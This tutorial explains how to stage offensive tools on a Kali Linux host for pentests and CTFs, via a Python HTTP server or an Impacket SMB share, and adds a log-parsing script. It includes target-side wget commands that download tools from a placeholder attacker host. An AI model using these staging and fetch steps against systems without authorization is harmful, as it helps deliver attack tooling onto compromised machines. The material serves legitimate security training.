Staging Malware and Tools on Kali Linux

Kali Linux is a widely used penetration testing platform that ships with a large collection of pre-installed tools ready to run with minimal configuration. Additional tools and resources can also be obtained and installed on the distribution for tasks that the default toolset does not cover.

A commonly encountered task when using Kali Linux, or any other host used for offensive security, is hosting capabilities that a target can access before or after compromise. There are various methods for staging capabilities, which are catalogued on the MITRE ATT&CK "Stage Capabilities" page; however, one of the easiest when conducting penetration tests or competing in CTFs is to host a collection of tools on a web server or an SMB share.

Python HTTP Server

To stage tools via a Python HTTP web server, run the following command on the attacking Kali Linux host. Once it is running, remote hosts can browse the directory containing the tools by connecting to the attacking host on the configured IP address and port.

# Attacker Host - set the port and the directory where the tools are located on the localhost
python3 -m http.server <port> --directory /path/to/tools

# Target Host - fetch a tool from the share (on Windows, wget is an alias for Invoke-WebRequest, which needs -OutFile to write the file to disk)
(Windows) powershell wget http://<attacker host IP>:<port>/<tool name> -OutFile <tool name>
(Linux) wget http://<attacker host IP>:<port>/<tool name>
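http.server writes one line per request to stderr in a fixed format, and that log is the record of which host fetched which tool; keeping and reviewing it matters both for engagement reporting and for a defender examining a captured staging server. The following is an added example, not part of the original note, that parses those lines and counts successful downloads per client; the log lines are constructed samples.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, Optional

# Line format produced by `python3 -m http.server` (BaseHTTPRequestHandler.log_message):
#   <client ip> - - [<dd/Mon/yyyy hh:mm:ss>] "<method> <path> <version>" <status> -
# Error lines use the same prefix but no quoted request line, so they do not match.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample of what the server prints while two hosts fetch tools.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023 12:34:56] "GET / HTTP/1.1" 200 -',
    '10.0.0.5 - - [10/Oct/2023 12:34:58] "GET /tool.exe HTTP/1.1" 200 -',
    '10.0.0.5 - - [10/Oct/2023 12:35:02] code 404, message File not found',
    '10.0.0.5 - - [10/Oct/2023 12:35:02] "GET /missing.exe HTTP/1.1" 404 -',
    '10.0.0.7 - - [10/Oct/2023 12:36:10] "GET /script.sh HTTP/1.1" 200 -',
    '10.0.0.7 - - [10/Oct/2023 12:36:40] "GET /script.sh HTTP/1.1" 200 -',
]


@dataclass(frozen=True)
class Request:
    client: str
    timestamp: str
    method: str
    path: str
    status: int


def parse_line(line: str) -> Optional[Request]:
    """Return a Request for a request log line, or None for error/unrelated lines."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return Request(m["ip"], m["ts"], m["method"], m["path"], int(m["status"]))


def successful_downloads(lines: Iterable[str]) -> list:
    """Only GET requests the server actually answered with 200 count as a transfer."""
    parsed = (parse_line(l) for l in lines)
    return [r for r in parsed if r and r.method == "GET" and r.status == 200]


def downloads_by_client(lines: Iterable[str]) -> Counter:
    """Count (client, path) pairs so repeated fetches of the same tool are visible."""
    return Counter((r.client, r.path) for r in successful_downloads(lines))


if __name__ == "__main__":
    for (client, path), n in sorted(downloads_by_client(SAMPLE_LOG).items()):
        print(f"{client} fetched {path} {n}x")
```

To use it on a real engagement, redirect the server's stderr to a file (`2> staging.log`) and pass the file's lines to `downloads_by_client`.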

Python SMB Server

Tools can also be staged on an SMB share with the following command, which uses smbserver.py from the Impacket toolkit. SMB is the native file-sharing protocol in Windows environments, so this method is better suited to staging tools on internal networks. Once the share is up, the target host can browse to it to access the tools.

# Attacker Host - set the directory where the tools are located on the localhost and the credentials clients must present
# (-smb2support enables the SMB2 dialect, which current Windows hosts require)
python3 smbserver.py SHARE /path/to/tools -smb2support -username <user> -password <pass>
